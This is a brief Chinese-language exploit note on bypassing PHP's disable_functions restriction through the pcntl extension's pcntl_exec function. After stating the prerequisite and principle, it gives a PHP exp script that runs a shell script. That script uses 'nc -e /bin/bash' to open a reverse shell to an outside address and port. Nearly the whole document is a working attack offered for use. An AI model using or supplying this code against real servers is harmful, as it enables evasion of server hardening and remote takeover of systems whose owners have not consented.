利用 pcntl_exec 绕过

1. 前提条件

PHP安装并启用了pcntl插件

2. 基本原理

利用pcntl_exec()这个pcntl插件专有的命令执行函数来执行系统命令，从而绕过disable_functions

3. exp

exp.php

#利用pcntl_exec()执行test.sh
<?php
if(function_exists('pcntl_exec')) {
  pcntl_exec("/bin/bash", array("/tmp/test.sh"));
} else {
    echo 'pcntl extension is not support!';
}
?>

test.sh

#!/bin/bash
nc -e /bin/bash 1.1.1.1 8888    #反弹shell